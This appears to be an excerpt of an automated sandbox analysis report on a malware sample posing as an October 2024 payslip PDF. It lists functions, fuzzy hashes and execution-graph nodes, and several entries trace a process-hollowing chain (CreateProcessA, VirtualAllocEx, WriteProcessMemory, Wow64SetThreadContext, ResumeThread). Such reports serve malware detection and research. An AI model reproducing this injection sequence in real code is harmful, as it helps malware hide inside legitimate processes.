                                              • Instruction ID: b3dec3f6243a69fddd5d510790378da36dd9f2cbab163709ca4c30249343cfca
                                              • Opcode Fuzzy Hash: 70cad92373688308fe5d7decde5a25812968f3f30c24a2087d7efe02a722d2df
                                              • Instruction Fuzzy Hash: F301A931B212189BCB58AA6AE840A9D776DF785354F104539E505E7344DB32ED05C780
                                              Function 0101D8C8 Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4492247130.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_101d000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 46cf06eafa74880ad193934f9077ac208c79d29aac941c9f7c121bdadc636b42
                                              • Instruction ID: 55665e90269af73fcd4c8eab20ec7768edb031bf20a662f9a797e75cb6a4e67b
                                              • Opcode Fuzzy Hash: 46cf06eafa74880ad193934f9077ac208c79d29aac941c9f7c121bdadc636b42
                                              • Instruction Fuzzy Hash: 9AF06271404354AAEB218E1ADCC8B66FFE9EF45734F18C45AED885A287C2799844CBB1
                                              Function 06846580 Relevance: .0, Instructions: 24COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c91b0e159b329f77459f976dc48d8cf6dff2453d9a792b0a946c0e7bbed36959
                                              • Instruction ID: 23b21e88c96bb8af24cb8ee5893126a195bf4cbdaebf59dcd8acb579852e65c4
                                              • Opcode Fuzzy Hash: c91b0e159b329f77459f976dc48d8cf6dff2453d9a792b0a946c0e7bbed36959
                                              • Instruction Fuzzy Hash: 3BE0D871D1520C5FDF90EFB08A1939F77A49B43208F2548E6D904CB146F136CE85CB41

                                              Non-executed Functions

                                              Function 068477B0 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-2843079600
                                              • Opcode ID: 8238ac81f7ade55934acfc3bad27604aca89f9e18fa0575392520bec18efc12a
                                              • Instruction ID: f1bb89aa302bfd6202766d7d87a9f036be1d1c3bc0bad043633f1d5a8f74ecbd
                                              • Opcode Fuzzy Hash: 8238ac81f7ade55934acfc3bad27604aca89f9e18fa0575392520bec18efc12a
                                              • Instruction Fuzzy Hash: 42122C30A102198FDB68EF69C994AADB7F6BF84304F208969D509EB358DB349D45CF81
                                              Function 0684AA48 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-1273862796
                                              • Opcode ID: e20d1ca2d2f1f603d7c29f730eeb5d21174f4cfbf282922b3be126ce51d2d846
                                              • Instruction ID: a169e68c399d0cf975ac2963f0a25831327434f51f84f0f68edefac8be0c9ee9
                                              • Opcode Fuzzy Hash: e20d1ca2d2f1f603d7c29f730eeb5d21174f4cfbf282922b3be126ce51d2d846
                                              • Instruction Fuzzy Hash: F2915E30A5020D9FDB6CEF65D594BAEB7F6BF44304F108429E841DB298DB789D45CB90
                                              Function 068471B0 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-981061697
                                              • Opcode ID: 8eb0578858ec20bc8486cc8e1eb3e4251642722a3baa3809b35f412daeb9fb0d
                                              • Instruction ID: 2edf82ce3584ee5f8b4bd8bf95811df4afbff77789052a2c8ed177173edf98f8
                                              • Opcode Fuzzy Hash: 8eb0578858ec20bc8486cc8e1eb3e4251642722a3baa3809b35f412daeb9fb0d
                                              • Instruction Fuzzy Hash: D9F12C30B01209CFDB58EF65D5A0AAEBBB6FF94300F648569D845DB368DB359C42CB90
                                              Function 068484E8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q
                                              • API String ID: 0-858218434
                                              • Opcode ID: cbe3c4ba24f10ec73fffbb859674dce92e4fbc7a84d4ca1c3c03ee58d45273cd
                                              • Instruction ID: d9fbab0f29c54ee7701d59ee2bdd56193242d453fbbca03a6476ca9851350b9f
                                              • Opcode Fuzzy Hash: cbe3c4ba24f10ec73fffbb859674dce92e4fbc7a84d4ca1c3c03ee58d45273cd
                                              • Instruction Fuzzy Hash: A4B14D70E012098FDB58EFA9D5906AEB7B6FF94314F248829D406DB359DB74DC82CB81
                                              Function 06848900 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LR]q$LR]q$$]q$$]q
                                              • API String ID: 0-3527005858
                                              • Opcode ID: ecfc73e07fb71b226f68bc53c2360fa1ed7f0a9f81b5aeec9414fd6db4095510
                                              • Instruction ID: 0582d5a35b70cc3680ba539cd534ad6e89f3bbdc199d6a6f840e8303b1bd9623
                                              • Opcode Fuzzy Hash: ecfc73e07fb71b226f68bc53c2360fa1ed7f0a9f81b5aeec9414fd6db4095510
                                              • Instruction Fuzzy Hash: F751E570B102098FDB58EF28D950A6E7BE6FF85314F148568E506DB398DB35EC41CB91
                                              Function 0684ADD6 Relevance: 5.2, Strings: 4, Instructions: 158COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q
                                              • API String ID: 0-858218434
                                              • Opcode ID: 0a4ec11af1e8ee9d042be681404220b46d41be0c2ff32258f71d6c7a7a497967
                                              • Instruction ID: e79f98ef9e42e68ead7f98582df6936fec6fd45f26de9c30540727d2239196be
                                              • Opcode Fuzzy Hash: 0a4ec11af1e8ee9d042be681404220b46d41be0c2ff32258f71d6c7a7a497967
                                              • Instruction Fuzzy Hash: A351BF70E112098FCF68EB68E590AADB3B6FF94310F148529E916DB358DB31DC42CB81

                                              Execution Graph

                                              Execution Coverage:8.9%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:247
                                              Total number of Limit Nodes:11
                                              execution_graph 24092 b3ca2e8 24093 b3ca2e9 24092->24093 24098 b3ca8c8 24093->24098 24115 b3ca92e 24093->24115 24133 b3ca8b9 24093->24133 24094 b3ca2f9 24099 b3ca8e2 24098->24099 24150 b3cad3c 24099->24150 24155 b3cb082 24099->24155 24160 b3cad67 24099->24160 24165 b3caf27 24099->24165 24173 b3cae05 24099->24173 24178 b3cb20b 24099->24178 24186 b3cb14a 24099->24186 24191 b3cae68 24099->24191 24196 b3cacc8 24099->24196 24200 b3cb268 24099->24200 24209 b3cad8c 24099->24209 24215 b3cb077 24099->24215 24220 b3cb1fb 24099->24220 24225 b3caf9b 24099->24225 24100 b3ca8ea 24100->24094 24116 b3ca931 24115->24116 24117 b3ca8bc 24115->24117 24116->24094 24119 b3cad3c 3 API calls 24117->24119 24120 b3caf9b 2 API calls 24117->24120 24121 b3cb1fb 2 API calls 24117->24121 24122 b3cb077 2 API calls 24117->24122 24123 b3cad8c 3 API calls 24117->24123 24124 b3cb268 5 API calls 24117->24124 24125 b3cacc8 2 API calls 24117->24125 24126 b3cae68 2 API calls 24117->24126 24127 b3cb14a 2 API calls 24117->24127 24128 b3cb20b 5 API calls 24117->24128 24129 b3cae05 2 API calls 24117->24129 24130 b3caf27 5 API calls 24117->24130 24131 b3cad67 3 API calls 24117->24131 24132 b3cb082 3 API calls 24117->24132 24118 b3ca8ea 24118->24094 24119->24118 24120->24118 24121->24118 24122->24118 24123->24118 24124->24118 24125->24118 24126->24118 24127->24118 24128->24118 24129->24118 24130->24118 24131->24118 24132->24118 24134 b3ca8bc 24133->24134 24136 b3cad3c 3 API calls 24134->24136 24137 b3caf9b 2 API calls 24134->24137 24138 b3cb1fb 2 API calls 24134->24138 24139 b3cb077 2 API calls 24134->24139 24140 b3cad8c 3 API calls 24134->24140 24141 b3cb268 5 API calls 24134->24141 24142 b3cacc8 2 API calls 24134->24142 24143 b3cae68 2 API calls 24134->24143 24144 b3cb14a 2 API calls 24134->24144 24145 b3cb20b 5 API calls 24134->24145 24146 b3cae05 2 API calls 24134->24146 24147 b3caf27 5 API calls 24134->24147 24148 b3cad67 3 API calls 24134->24148 24149 b3cb082 3 API calls 24134->24149 24135 b3ca8ea 24135->24094 24136->24135 24137->24135 24138->24135 24139->24135 24140->24135 24141->24135 24142->24135 24143->24135 24144->24135 24145->24135 24146->24135 24147->24135 24148->24135 24149->24135 24151 b3cad48 24150->24151 24151->24150 24231 b3cbb48 24151->24231 24239 b3cbad1 24151->24239 24244 b3cbad8 24151->24244 24156 b3cad3c 24155->24156 24157 b3cbb48 3 API calls 24156->24157 24158 b3cbad8 2 API calls 24156->24158 24159 b3cbad1 2 API calls 24156->24159 24157->24156 24158->24156 24159->24156 24161 b3cad3c 24160->24161 24162 b3cbb48 3 API calls 24161->24162 24163 b3cbad8 2 API calls 24161->24163 24164 b3cbad1 2 API calls 24161->24164 24162->24161 24163->24161 24164->24161 24260 b3c92b9 24165->24260 24264 b3c92c0 24165->24264 24166 b3cb50c 24167 b3cad3c 24167->24166 24170 b3cbb48 3 API calls 24167->24170 24171 b3cbad8 2 API calls 24167->24171 24172 b3cbad1 2 API calls 24167->24172 24170->24167 24171->24167 24172->24167 24174 b3cae15 24173->24174 24268 b3c9458 24174->24268 24272 b3c9450 24174->24272 24175 b3caf07 24175->24100 24276 b3cb970 24178->24276 24281 b3cb960 24178->24281 24179 b3cb40d 24179->24100 24180 b3cad3c 24180->24179 24183 b3cbb48 3 API calls 24180->24183 24184 b3cbad8 2 API calls 24180->24184 24185 b3cbad1 2 API calls 24180->24185 24183->24180 24184->24180 24185->24180 24187 b3cb150 24186->24187 24286 b3c9979 24187->24286 24290 b3c9980 24187->24290 24188 b3cb2d3 24188->24100 24192 b3cae76 24191->24192 24194 b3c9458 WriteProcessMemory 24192->24194 24195 b3c9450 WriteProcessMemory 24192->24195 24193 b3caf8a 24193->24100 24194->24193 24195->24193 24294 b3c9b0c 24196->24294 24298 b3c9b18 24196->24298 24201 b3cb271 24200->24201 24204 b3c9458 WriteProcessMemory 24201->24204 24205 b3c9450 WriteProcessMemory 24201->24205 24202 b3cb5a7 24203 b3cad3c 24203->24202 24206 b3cbb48 3 API calls 24203->24206 24207 b3cbad8 2 API calls 24203->24207 24208 b3cbad1 2 API calls 24203->24208 24204->24203 24205->24203 24206->24203 24207->24203 24208->24203 24211 b3cad3c 24209->24211 24210 b3cb262 24210->24100 24211->24210 24212 b3cbb48 3 API calls 24211->24212 24213 b3cbad8 2 API calls 24211->24213 24214 b3cbad1 2 API calls 24211->24214 24212->24211 24213->24211 24214->24211 24216 b3cb104 24215->24216 24302 b3c9398 24216->24302 24306 b3c9390 24216->24306 24217 b3cb122 24221 b3cb1ff 24220->24221 24223 b3c9979 ReadProcessMemory 24221->24223 24224 b3c9980 ReadProcessMemory 24221->24224 24222 b3cb2d3 24222->24100 24223->24222 24224->24222 24227 b3cafa7 24225->24227 24226 b3cb5cd 24226->24100 24227->24226 24229 b3c9979 ReadProcessMemory 24227->24229 24230 b3c9980 ReadProcessMemory 24227->24230 24228 b3cb2d3 24228->24100 24229->24228 24230->24228 24232 b3cbaf4 24231->24232 24235 b3cbb56 24231->24235 24249 b3c9209 24232->24249 24253 b3c9210 24232->24253 24233 b3cbb00 24233->24151 24234 b3cbce3 24234->24151 24235->24234 24257 b3c2958 24235->24257 24240 b3cbad8 24239->24240 24241 b3cbb00 24240->24241 24242 b3c9209 ResumeThread 24240->24242 24243 b3c9210 ResumeThread 24240->24243 24241->24151 24242->24241 24243->24241 24245 b3cbaed 24244->24245 24246 b3cbb00 24245->24246 24247 b3c9209 ResumeThread 24245->24247 24248 b3c9210 ResumeThread 24245->24248 24246->24151 24247->24246 24248->24246 24250 b3c9250 ResumeThread 24249->24250 24252 b3c9281 24250->24252 24252->24233 24254 b3c9250 ResumeThread 24253->24254 24256 b3c9281 24254->24256 24256->24233 24258 b3cc1e0 PostMessageW 24257->24258 24259 b3cc24c 24258->24259 24259->24235 24261 b3c9305 Wow64SetThreadContext 24260->24261 24263 b3c934d 24261->24263 24263->24167 24265 b3c9305 Wow64SetThreadContext 24264->24265 24267 b3c934d 24265->24267 24267->24167 24269 b3c94a0 WriteProcessMemory 24268->24269 24271 b3c94f7 24269->24271 24271->24175 24273 b3c9458 WriteProcessMemory 24272->24273 24275 b3c94f7 24273->24275 24275->24175 24277 b3cb985 24276->24277 24279 b3c92b9 Wow64SetThreadContext 24277->24279 24280 b3c92c0 Wow64SetThreadContext 24277->24280 24278 b3cb99b 24278->24180 24279->24278 24280->24278 24282 b3cb985 24281->24282 24284 b3c92b9 Wow64SetThreadContext 24282->24284 24285 b3c92c0 Wow64SetThreadContext 24282->24285 24283 b3cb99b 24283->24180 24284->24283 24285->24283 24287 b3c9980 ReadProcessMemory 24286->24287 24289 b3c9a0f 24287->24289 24289->24188 24291 b3c99cb ReadProcessMemory 24290->24291 24293 b3c9a0f 24291->24293 24293->24188 24295 b3c9b18 CreateProcessA 24294->24295 24297 b3c9d63 24295->24297 24299 b3c9ba1 CreateProcessA 24298->24299 24301 b3c9d63 24299->24301 24303 b3c93d8 VirtualAllocEx 24302->24303 24305 b3c9415 24303->24305 24305->24217 24307 b3c9398 VirtualAllocEx 24306->24307 24309 b3c9415 24307->24309 24309->24217 24005 1674668 24006 167467a 24005->24006 24007 1674686 24006->24007 24011 1674779 24006->24011 24016 1674210 24007->24016 24009 16746a5 24012 167479d 24011->24012 24020 1674879 24012->24020 24024 1674888 24012->24024 24017 167421b 24016->24017 24032 1675cb8 24017->24032 24019 1677025 24019->24009 24021 1674888 24020->24021 24023 167498c 24021->24023 24028 16744d4 24021->24028 24026 16748af 24024->24026 24025 167498c 24025->24025 24026->24025 24027 16744d4 CreateActCtxA 24026->24027 24027->24025 24029 1675918 CreateActCtxA 24028->24029 24031 16759db 24029->24031 24033 1675cc3 24032->24033 24036 1675cd8 24033->24036 24035 1677275 24035->24019 24037 1675ce3 24036->24037 24040 1675d08 24037->24040 24039 167735a 24039->24035 24041 1675d13 24040->24041 24044 1675d38 24041->24044 24043 167744d 24043->24039 24045 1675d43 24044->24045 24047 167874b 24045->24047 24051 167adf0 24045->24051 24046 1678789 24046->24043 24047->24046 24055 167cee1 24047->24055 24060 167cef0 24047->24060 24065 167ae17 24051->24065 24068 167ae28 24051->24068 24052 167ae06 24052->24047 24057 167cef0 24055->24057 24056 167cf35 24056->24046 24057->24056 24076 167d1c0 24057->24076 24080 167d1b0 24057->24080 24061 167cf11 24060->24061 24062 167cf35 24061->24062 24063 167d1c0 GetModuleHandleW 24061->24063 24064 167d1b0 GetModuleHandleW 24061->24064 24062->24046 24063->24062 24064->24062 24066 167ae37 24065->24066 24071 167af11 24065->24071 24066->24052 24070 167af11 GetModuleHandleW 24068->24070 24069 167ae37 24069->24052 24070->24069 24072 167af54 24071->24072 24073 167af31 24071->24073 24072->24066 24073->24072 24074 167b158 GetModuleHandleW 24073->24074 24075 167b185 24074->24075 24075->24066 24077 167d1cd 24076->24077 24078 167d207 24077->24078 24084 167b4b8 24077->24084 24078->24056 24081 167d1cd 24080->24081 24082 167d207 24081->24082 24083 167b4b8 GetModuleHandleW 24081->24083 24082->24056 24083->24082 24085 167b4c3 24084->24085 24087 167df20 24085->24087 24088 167d90c 24085->24088 24087->24087 24089 167d917 24088->24089 24090 1675d38 GetModuleHandleW 24089->24090 24091 167df8f 24090->24091 24091->24087 24310 167d2d8 24311 167d31e 24310->24311 24315 167d4a7 24311->24315 24319 167d4b8 24311->24319 24312 167d40b 24316 167d4b8 24315->24316 24322 167b580 24316->24322 24320 167b580 DuplicateHandle 24319->24320 24321 167d4e6 24320->24321 24321->24312 24323 167d520 DuplicateHandle 24322->24323 24324 167d4e6 24323->24324 24324->24312

                                              Executed Functions

                                              Function 0B3C9B0C Relevance: 1.8, APIs: 1, Instructions: 252processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 317 b3c9b0c-b3c9bad 320 b3c9baf-b3c9bb9 317->320 321 b3c9be6-b3c9c06 317->321 320->321 322 b3c9bbb-b3c9bbd 320->322 328 b3c9c3f-b3c9c6e 321->328 329 b3c9c08-b3c9c12 321->329 323 b3c9bbf-b3c9bc9 322->323 324 b3c9be0-b3c9be3 322->324 326 b3c9bcd-b3c9bdc 323->326 327 b3c9bcb 323->327 324->321 326->326 330 b3c9bde 326->330 327->326 337 b3c9ca7-b3c9d61 CreateProcessA 328->337 338 b3c9c70-b3c9c7a 328->338 329->328 331 b3c9c14-b3c9c16 329->331 330->324 332 b3c9c18-b3c9c22 331->332 333 b3c9c39-b3c9c3c 331->333 335 b3c9c24 332->335 336 b3c9c26-b3c9c35 332->336 333->328 335->336 336->336 339 b3c9c37 336->339 349 b3c9d6a-b3c9df0 337->349 350 b3c9d63-b3c9d69 337->350 338->337 340 b3c9c7c-b3c9c7e 338->340 339->333 342 b3c9c80-b3c9c8a 340->342 343 b3c9ca1-b3c9ca4 340->343 344 b3c9c8c 342->344 345 b3c9c8e-b3c9c9d 342->345 343->337 344->345 345->345 347 b3c9c9f 345->347 347->343 360 b3c9e00-b3c9e04 349->360 361 b3c9df2-b3c9df6 349->361 350->349 363 b3c9e14-b3c9e18 360->363 364 b3c9e06-b3c9e0a 360->364 361->360 362 b3c9df8 361->362 362->360 365 b3c9e28-b3c9e2c 363->365 366 b3c9e1a-b3c9e1e 363->366 364->363 367 b3c9e0c 364->367 369 b3c9e3e-b3c9e45 365->369 370 b3c9e2e-b3c9e34 365->370 366->365 368 b3c9e20 366->368 367->363 368->365 371 b3c9e5c 369->371 372 b3c9e47-b3c9e56 369->372 370->369 374 b3c9e5d 371->374 372->371 374->374
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0B3C9D4E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 2ff119e6d7858234d74a9cd2c810bba816f963f08b45a0364dc9faa6c3696d20
                                              • Instruction ID: 38c1fc662ab6ea436fdfcee736176823722a6c2b20b98692b056388d1ef0a00b
                                              • Opcode Fuzzy Hash: 2ff119e6d7858234d74a9cd2c810bba816f963f08b45a0364dc9faa6c3696d20
                                              • Instruction Fuzzy Hash: 57A16D71D00219DFDB25DFA8C8407EEBBB2BF48314F1586AAD809A7240DB759D85CF91
                                              Function 0B3C9B18 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 375 b3c9b18-b3c9bad 377 b3c9baf-b3c9bb9 375->377 378 b3c9be6-b3c9c06 375->378 377->378 379 b3c9bbb-b3c9bbd 377->379 385 b3c9c3f-b3c9c6e 378->385 386 b3c9c08-b3c9c12 378->386 380 b3c9bbf-b3c9bc9 379->380 381 b3c9be0-b3c9be3 379->381 383 b3c9bcd-b3c9bdc 380->383 384 b3c9bcb 380->384 381->378 383->383 387 b3c9bde 383->387 384->383 394 b3c9ca7-b3c9d61 CreateProcessA 385->394 395 b3c9c70-b3c9c7a 385->395 386->385 388 b3c9c14-b3c9c16 386->388 387->381 389 b3c9c18-b3c9c22 388->389 390 b3c9c39-b3c9c3c 388->390 392 b3c9c24 389->392 393 b3c9c26-b3c9c35 389->393 390->385 392->393 393->393 396 b3c9c37 393->396 406 b3c9d6a-b3c9df0 394->406 407 b3c9d63-b3c9d69 394->407 395->394 397 b3c9c7c-b3c9c7e 395->397 396->390 399 b3c9c80-b3c9c8a 397->399 400 b3c9ca1-b3c9ca4 397->400 401 b3c9c8c 399->401 402 b3c9c8e-b3c9c9d 399->402 400->394 401->402 402->402 404 b3c9c9f 402->404 404->400 417 b3c9e00-b3c9e04 406->417 418 b3c9df2-b3c9df6 406->418 407->406 420 b3c9e14-b3c9e18 417->420 421 b3c9e06-b3c9e0a 417->421 418->417 419 b3c9df8 418->419 419->417 422 b3c9e28-b3c9e2c 420->422 423 b3c9e1a-b3c9e1e 420->423 421->420 424 b3c9e0c 421->424 426 b3c9e3e-b3c9e45 422->426 427 b3c9e2e-b3c9e34 422->427 423->422 425 b3c9e20 423->425 424->420 425->422 428 b3c9e5c 426->428 429 b3c9e47-b3c9e56 426->429 427->426 431 b3c9e5d 428->431 429->428 431->431
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0B3C9D4E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 3aa85da54685f50c9c51a6e93e204a846b1f0a1df632ab8e5e800933b123b30e
                                              • Instruction ID: 872a635145b6a03c55bfd94bac751e83ccaae107e16b47ccfb2f7daba4d9919d
                                              • Opcode Fuzzy Hash: 3aa85da54685f50c9c51a6e93e204a846b1f0a1df632ab8e5e800933b123b30e
                                              • Instruction Fuzzy Hash: 1A916C71D00219DFEB25DFA8C8407EEBBB2BF48314F1586AAD809A7240DB759D85CF91
                                              Function 0167AF11 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 432 167af11-167af2f 433 167af31-167af3e call 1679e80 432->433 434 167af5b-167af5f 432->434 440 167af54 433->440 441 167af40-167af4e call 167b5b8 433->441 436 167af73-167afb4 434->436 437 167af61-167af6b 434->437 443 167afb6-167afbe 436->443 444 167afc1-167afcf 436->444 437->436 440->434 441->440 450 167b090-167b150 441->450 443->444 445 167aff3-167aff5 444->445 446 167afd1-167afd6 444->446 451 167aff8-167afff 445->451 448 167afe1 446->448 449 167afd8-167afdf call 1679e8c 446->449 453 167afe3-167aff1 448->453 449->453 483 167b152-167b155 450->483 484 167b158-167b183 GetModuleHandleW 450->484 454 167b001-167b009 451->454 455 167b00c-167b013 451->455 453->451 454->455 458 167b015-167b01d 455->458 459 167b020-167b029 call 1679e9c 455->459 458->459 463 167b036-167b03b 459->463 464 167b02b-167b033 459->464 465 167b03d-167b044 463->465 466 167b059-167b066 463->466 464->463 465->466 468 167b046-167b056 call 1679eac call 1679ebc 465->468 473 167b089-167b08f 466->473 474 167b068-167b086 466->474 468->466 474->473 483->484 485 167b185-167b18b 484->485 486 167b18c-167b1a0 484->486 485->486
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0167B176
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165773127.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1670000_sgxIb.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: fa6648e5ae4e9ade36810f5c26caae9c2c320a004de8fa0a664f4d6b1e264dfd
                                              • Instruction ID: b2149f368d700129e88608a2773898dc2fd36f1e88191925d976c8f89433ed19
                                              • Opcode Fuzzy Hash: fa6648e5ae4e9ade36810f5c26caae9c2c320a004de8fa0a664f4d6b1e264dfd
                                              • Instruction Fuzzy Hash: 6C8122B0A00B058FD724DF6AD84475ABBF1BF88200F00892DD45AD7B50DB79E849CB94
                                              Function 016744D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 489 16744d4-16759d9 CreateActCtxA 492 16759e2-1675a3c 489->492 493 16759db-16759e1 489->493 500 1675a3e-1675a41 492->500 501 1675a4b-1675a4f 492->501 493->492 500->501 502 1675a51-1675a5d 501->502 503 1675a60 501->503 502->503 505 1675a61 503->505 505->505
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 016759C9
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165773127.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1670000_sgxIb.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: fd569357fcb320c22c8f2d73501b2e2b429cb5d39a28ffc5f65634ef233f75a7
                                              • Instruction ID: 1dd552a181bb559b9d741d38fc94b011467dfaa27e9377638261eb0307e99127
                                              • Opcode Fuzzy Hash: fd569357fcb320c22c8f2d73501b2e2b429cb5d39a28ffc5f65634ef233f75a7
                                              • Instruction Fuzzy Hash: BB41E0B0C0071DCBDB24DFA9C884B9EBBF5BF49704F20806AD409AB255DB75694ACF90
                                              Function 0167590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 506 167590c-16759d9 CreateActCtxA 508 16759e2-1675a3c 506->508 509 16759db-16759e1 506->509 516 1675a3e-1675a41 508->516 517 1675a4b-1675a4f 508->517 509->508 516->517 518 1675a51-1675a5d 517->518 519 1675a60 517->519 518->519 521 1675a61 519->521 521->521
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 016759C9
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165773127.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1670000_sgxIb.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: e0b1008ca1672739594da216e9244e8fe45159296b0f9e6ade7a10807f3f2ed7
                                              • Instruction ID: c643d339fe53a590fda8cee485f3023ab2d818ef255959e48c92d98e36a5768b
                                              • Opcode Fuzzy Hash: e0b1008ca1672739594da216e9244e8fe45159296b0f9e6ade7a10807f3f2ed7
                                              • Instruction Fuzzy Hash: 0E41DFB0C00719CBDB24DFA9C884B9EBBB1BF49704F24806AD409AB255DB75594ACF90
                                              Function 0B3C9450 Relevance: 1.6, APIs: 1, Instructions: 75injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 522 b3c9450-b3c94a6 525 b3c94a8-b3c94b4 522->525 526 b3c94b6-b3c94f5 WriteProcessMemory 522->526 525->526 528 b3c94fe-b3c952e 526->528 529 b3c94f7-b3c94fd 526->529 529->528
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0B3C94E8
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
